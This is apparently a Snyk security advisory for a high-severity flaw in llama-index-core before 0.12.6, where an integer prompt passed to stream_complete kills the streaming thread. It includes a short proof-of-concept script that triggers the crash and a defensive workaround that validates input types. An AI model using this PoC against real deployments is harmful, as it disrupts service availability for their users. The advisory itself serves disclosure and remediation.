Improper Handling of Exceptional Conditions Affecting llama-index-core package, versions [,0.12.6)


Severity

High (CVSS assessment made by Snyk's Security Team)

Threat Intelligence

Exploit Maturity: Proof of Concept

  • Snyk ID: SNYK-PYTHON-LLAMAINDEXCORE-9511125
  • Published: 24 Mar 2025
  • Disclosed: 20 Mar 2025
  • Credit: Massimiliano Pippi

Introduced: 20 Mar 2025

CVE-2024-12704
CWE-755

How to fix?

Upgrade llama-index-core to version 0.12.6 or higher.

Overview

llama-index-core is an interface between LLMs and your data.

Affected versions of this package are vulnerable to Improper Handling of Exceptional Conditions via the stream_complete method of the LangChainLLM class. An attacker can disrupt service availability by providing an input of type integer instead of a string: the resulting error inside the stream function terminates the streaming thread, while the parent process continues to run.

PoC

import os

import openai
from langchain_openai import ChatOpenAI
from llama_index.llms.langchain import LangChainLLM

os.environ["OPENAI_API_KEY"] = "<YOUR_API_KEY>"
openai.api_key = os.environ["OPENAI_API_KEY"]

llm = LangChainLLM(llm=ChatOpenAI(model="gpt-3.5-turbo"))

# Passing an integer instead of a string triggers the unhandled exception.
messages = 123

# Generate response: the streaming thread dies on the type error,
# but the process keeps running.
response_gen = llm.stream_complete(messages)
for delta in response_gen:
    print(delta.delta, end="")
print("\n")
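For callers that cannot upgrade immediately, one defensive workaround is to validate the prompt type in the calling thread before it ever reaches stream_complete, so a bad input raises a visible TypeError instead of silently killing the streaming worker. The sketch below is a minimal illustration of that pattern; validate_prompt is a hypothetical helper written for this example, not part of the llama-index-core API.

import sys

# Hypothetical helper (not part of llama-index-core): reject
# non-string prompts up front, in the caller's own thread.
def validate_prompt(prompt):
    if not isinstance(prompt, str):
        raise TypeError(
            f"prompt must be a str, got {type(prompt).__name__}"
        )
    return prompt

# An integer prompt is rejected immediately and visibly,
# instead of terminating a background streaming thread.
try:
    validate_prompt(123)
except TypeError as exc:
    print(exc, file=sys.stderr)

This keeps the failure on the request path, where ordinary error handling (logging, HTTP 400 responses, retries) can deal with it.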
